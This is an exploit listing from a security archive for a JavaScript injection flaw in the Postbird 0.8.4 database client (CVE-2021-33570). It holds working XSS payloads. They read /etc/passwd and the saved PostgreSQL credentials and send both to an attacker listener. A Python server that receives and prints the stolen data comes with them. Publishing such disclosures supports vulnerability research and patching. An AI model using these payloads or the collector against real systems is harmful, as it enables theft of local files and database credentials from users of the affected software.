exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Postbird 0.8.4 Cross Site Scripting / Local File Inclusion

Postbird 0.8.4 Cross Site Scripting / Local File Inclusion
Posted May 27, 2021
Authored by Debshubra Chakraborty

Postbird version 0.8.4 suffers from a javascript injection vulnerability that allows for cross site scripting and local file inclusion.

tags | exploit, local, javascript, xss, file inclusion
advisories | CVE-2021-33570
SHA-256 | a50f986fffa593ec901590f6e7af89c7caa33805339e420f6058a47850eb4854
Download | Favorite | View

Postbird 0.8.4 Cross Site Scripting / Local File Inclusion

Change Mirror Download
# Exploit Title: Postbird 0.8.4 - Javascript Injection
# Date: [26 May 2021]
# Exploit Author: Debshubra Chakraborty
# Vendor Homepage: https://github.com/paxa/postbird
# Software Link: https://www.electronjs.org/apps/postbird
# Version: 0.8.4 
# Tested on: Linux
# CVE : CVE-2021-33570

"""
XSS Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">

LFI Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">

PostgreSQL Password Stealing Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">

"""

from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse
import re

hostName = '0.0.0.0'
serverPort = 5555

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        parse(urllib.parse.unquote(self.requestline))

    def log_message(self, format, *args):
        return   


def parse(data):
    expression = re.search('\S+=', data)
    attr = expression.group()

    if attr[2:len(attr)-1] == 'file':
        data = data[12:len(data)-11]    
        data = data.rsplit('\\n')
        print(f'\n[+] File received from LFI: \n\n')
        for output in data:
            print(output)

    elif attr[2:len(attr)-1] == 'xss':
        data = data[11:len(data)-10]
        print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
    
    elif attr[2:len(attr)-1] == 'credentials':
        pos = re.search('{"\S+:', data)
        data = data[pos.start():len(data)-11]
        for i in range(2, len(data), 1):
            if data[i] == '"':
                pos = i
                break

        host = data[2:pos]
        data = data[14:]
        data = data.rsplit(',')
        print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
        for output in data:
            print(output)
    
    else:
        print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')


def main():        
    global hostName, serverPort
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("\nServer stopped.")


if __name__ == "__main__":
    main()
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close